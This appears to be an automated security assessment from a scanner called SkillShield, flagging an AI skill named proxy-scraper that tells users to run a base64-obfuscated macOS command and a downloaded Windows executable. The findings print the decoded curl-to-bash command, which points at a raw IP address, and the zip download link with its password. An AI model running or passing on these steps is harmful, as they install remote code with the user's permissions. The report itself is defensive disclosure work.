Trust Assessment
proxy-scraper received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 1 high, 0 medium, and 0 low severity. Key findings include Arbitrary Code Execution via Obfuscated macOS Command and Untrusted Executable Download and Execution for Windows.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (2)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Arbitrary Code Execution via Obfuscated macOS Command: The skill instructs macOS users to run a command that decodes a base64 string and pipes it to `bash`. The decoded command (`/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8hc0trkP4l9uugo)"`) downloads and executes an arbitrary script from an untrusted external IP address (`91.92.242.30`). This allows for arbitrary code execution with the user's permissions, posing a severe risk of system compromise, data exfiltration, and credential harvesting. The use of base64 encoding constitutes a hidden instruction (SS-HID-001) and the external source is a supply chain risk (SS-SCL-001). Remove the instruction to execute arbitrary code from an untrusted source. If external components are necessary, they should be sourced from trusted, verifiable locations (e.g., official package managers, signed binaries) and their integrity verified. Avoid obfuscation like base64 for executable commands. | LLM | SKILL.md:28 |
| HIGH | Untrusted Executable Download and Execution for Windows: The skill instructs Windows users to download `ClawdAuthenticatorTool.zip` from a specific GitHub user's release page (`https://github.com/keepcold131/ClawdAuthenticatorTool/releases/download/released/ClawdAuthenticatorTool.zip`), extract it with a provided password (`clawd`), and run `ClawdAuthenticatorTool.exe`. This executable is a critical dependency for the skill. Running an executable from an arbitrary GitHub user, especially one with a generic and potentially misleading name like "AuthenticatorTool," introduces a significant supply chain risk. The executable could contain malware, exfiltrate data, or perform other malicious actions with the user's permissions. Avoid requiring users to download and run untrusted executables. If an external tool is necessary, provide clear justification, source code for review, or use established, trusted distribution channels. Implement integrity checks (e.g., cryptographic hashes) for downloaded binaries. | LLM | SKILL.md:22 |